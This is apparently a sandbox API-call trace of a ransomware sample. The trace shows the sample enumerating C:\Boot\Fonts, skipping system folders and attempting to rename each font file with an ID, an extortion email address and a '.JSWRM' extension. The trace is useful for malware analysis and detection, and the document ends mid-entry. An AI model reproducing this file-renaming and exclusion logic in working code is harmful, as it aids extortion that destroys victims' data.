[0063.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meiryon_boot.ttf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meiryon_boot.ttf", cchWideChar=16, lpMultiByteStr=0x2412e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meiryon_boot.ttf", lpUsedDefaultChar=0x0) returned 16 [0063.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.866] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.868] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0063.868] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.868] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.868] CloseHandle (hObject=0xffffffff) returned 1 [0063.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0063.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0063.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0063.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0063.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0063.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0063.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0063.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.868] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0063.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.869] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2=".") returned 1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="..") returned 1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="...") returned 1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="windows") returned -1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="recovery") returned -1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="perflogs") returned -1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="documents and settings") returned 1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="system volume information") returned -1 [0063.869] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="msocache") returned -1 [0063.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meiryo_boot.ttf", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meiryo_boot.ttf", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meiryo_boot.ttf", lpUsedDefaultChar=0x0) returned 15 [0063.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meiryo_boot.ttf", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meiryo_boot.ttf", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meiryo_boot.ttf", lpUsedDefaultChar=0x0) returned 15 [0063.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.869] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.871] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.871] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.871] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.871] CloseHandle (hObject=0xffffffff) returned 1 [0063.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0063.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0063.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0063.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0063.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.871] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.871] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2=".") returned 1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="..") returned 1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="...") returned 1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="windows") returned -1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="recovery") returned -1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="perflogs") returned -1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="documents and settings") returned 1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="system volume information") returned -1 [0063.872] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="msocache") returned -1 [0063.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjhn_boot.ttf", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0063.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjhn_boot.ttf", cchWideChar=14, lpMultiByteStr=0x345f610, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msjhn_boot.ttf", lpUsedDefaultChar=0x0) returned 14 [0063.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjhn_boot.ttf", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0063.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjhn_boot.ttf", cchWideChar=14, lpMultiByteStr=0x345f5e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msjhn_boot.ttf", lpUsedDefaultChar=0x0) returned 14 [0063.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.872] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.872] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987243200) returned 0 [0063.872] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.873] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.873] CloseHandle (hObject=0xffffffff) returned 1 [0063.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0063.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0063.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0063.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2261b0 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0063.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2261b0 | out: hHeap=0x1e0000) returned 1 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.873] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.873] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0063.873] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2=".") returned 1 [0063.873] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="..") returned 1 [0063.873] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="...") returned 1 [0063.873] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="windows") returned -1 [0063.873] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="recovery") returned -1 [0063.873] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="perflogs") returned -1 [0063.873] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="documents and settings") returned 1 [0063.873] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.874] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="system volume information") returned -1 [0063.874] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="msocache") returned -1 [0063.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjh_boot.ttf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0063.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjh_boot.ttf", cchWideChar=13, lpMultiByteStr=0x345f610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msjh_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0063.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0063.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjh_boot.ttf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0063.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjh_boot.ttf", cchWideChar=13, lpMultiByteStr=0x345f5e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msjh_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0063.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0063.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.874] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.874] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234336960) returned 0 [0063.875] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.875] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, 